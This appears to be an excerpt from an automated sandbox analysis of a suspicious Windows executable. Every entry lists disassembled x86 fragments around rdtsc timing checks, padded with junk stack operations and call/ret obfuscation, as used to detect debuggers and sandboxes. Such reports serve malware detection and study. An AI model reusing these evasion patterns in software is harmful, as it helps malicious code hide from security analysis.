                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF1C4 second address: DDF216 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F43C9098CECh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F43C9098CF3h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F43C9098CF4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F43C9098CEBh 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF216 second address: DDF2AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jnl 00007F43C8AE008Dh 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F43C8AE0078h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e call 00007F43C8AE0083h 0x00000033 pop ecx 0x00000034 push 00000003h 0x00000036 mov edi, dword ptr [ebp+122D2C19h] 0x0000003c push 00000000h 0x0000003e cld 0x0000003f or dword ptr [ebp+122D383Bh], edi 0x00000045 push 00000003h 0x00000047 jmp 00007F43C8AE007Ch 0x0000004c call 00007F43C8AE0079h 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF2AC second address: DDF2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF2B0 second address: DDF2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F43C8AE007Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007F43C8AE0096h 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F43C8AE0076h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF2D6 second address: DDF2F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF2F5 second address: DDF2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF2F9 second address: DDF337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F43C9098CF7h 0x00000010 pop eax 0x00000011 or edi, 25FE2CFCh 0x00000017 lea ebx, dword ptr [ebp+12463DC2h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jnl 00007F43C9098CECh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF337 second address: DDF33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF33D second address: DDF341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD6BF6 second address: DD6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFE9DA second address: DFE9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F43C9098CEEh 0x0000000b jmp 00007F43C9098CEBh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFE9F9 second address: DFE9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFECB8 second address: DFECBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFECBD second address: DFECC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFF2FC second address: DFF32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F43C9098CF6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF3h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFF32C second address: DFF336 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFF87E second address: DFF88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CEBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFF9FE second address: DFFA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFFA05 second address: DFFA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007F43C9098CE6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F43C9098CF7h 0x00000017 jmp 00007F43C9098CF6h 0x0000001c popad 0x0000001d jng 00007F43C9098CE8h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFFA4D second address: DFFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD0011 second address: DD0019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DFFBB6 second address: DFFBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E001E6 second address: E00206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C9098CECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F43C9098CF2h 0x00000011 jnp 00007F43C9098CE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E00332 second address: E00338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E00338 second address: E0035F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C9098CEFh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0035F second address: E00365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E00365 second address: E00369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E00369 second address: E0036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E004C2 second address: E004C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E004C6 second address: E004E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F43C8AE0084h 0x0000000c pop ebx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E004E2 second address: E00535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C9098D13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007F43C9098CF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0092E second address: E00932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E00932 second address: E0095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 jmp 00007F43C9098CF5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0095C second address: E00966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DCC936 second address: DCC954 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DCC954 second address: DCC95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E057AA second address: E057B4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E07A6D second address: E07A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD35F9 second address: DD35FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD35FF second address: DD3605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD3605 second address: DD3623 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F43C9098CE8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD3623 second address: DD3627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DD3627 second address: DD3639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0A1C0 second address: E0A1E4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0081h 0x00000008 jmp 00007F43C8AE007Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F43C8AE007Ch 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0B3F4 second address: E0B3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0F445 second address: E0F450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0F450 second address: E0F457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0FB5D second address: E0FB61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0FB61 second address: E0FB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0FB67 second address: E0FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F43C8AE008Ah 0x0000000d jnc 00007F43C8AE0078h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E0FD04 second address: E0FD09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E12250 second address: E12254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1240B second address: E12416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F43C9098CE6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E12416 second address: E1241B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1241B second address: E12421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E12957 second address: E1295C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1295C second address: E12966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E12DAD second address: E12DCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F43C8AE0076h 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 jnc 00007F43C8AE0076h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E12F11 second address: E12F37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 0A14A744h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E12F37 second address: E12F4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F43C8AE0076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 jg 00007F43C8AE007Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E143FB second address: E14400 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E167BA second address: E167CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E16E0F second address: E16E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1A413 second address: E1A46D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F43C8AE0078h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D18D8h] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D2DBCh], esi 0x00000034 push 00000000h 0x00000036 mov edi, 1F4D0A95h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F43C8AE0084h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1A46D second address: E1A472 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DC43D1 second address: DC4428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a js 00007F43C8AE0084h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F43C8AE007Ch 0x00000017 push edx 0x00000018 jc 00007F43C8AE0076h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F43C8AE0082h 0x00000028 jmp 00007F43C8AE0088h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1DA99 second address: E1DAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1DAA7 second address: E1DAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1DAAC second address: E1DAFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C9098CF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2873h], edx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2A85h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F43C9098CE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push eax 0x00000036 push ecx 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2094D second address: E2096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F43C8AE007Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E21DB2 second address: E21DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E21DB6 second address: E21DC0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DCE4CE second address: DCE4D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E283D4 second address: E283F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E283F4 second address: E283F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E283F8 second address: E2845B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, ebx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F43C8AE0078h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jnp 00007F43C8AE007Ah 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F43C8AE0078h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D35DEh], eax 0x0000004e xor dword ptr [ebp+124A1BD8h], eax 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2845B second address: E28466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E28466 second address: E2846A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E29421 second address: E29427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E29427 second address: E2942B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2A58A second address: E2A59E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2A59E second address: E2A5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2A5BB second address: E2A5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2B69F second address: E2B6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2B6A3 second address: E2B6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E21F64 second address: E21F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E21F68 second address: E21F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E22051 second address: E22055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E22055 second address: E2205B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
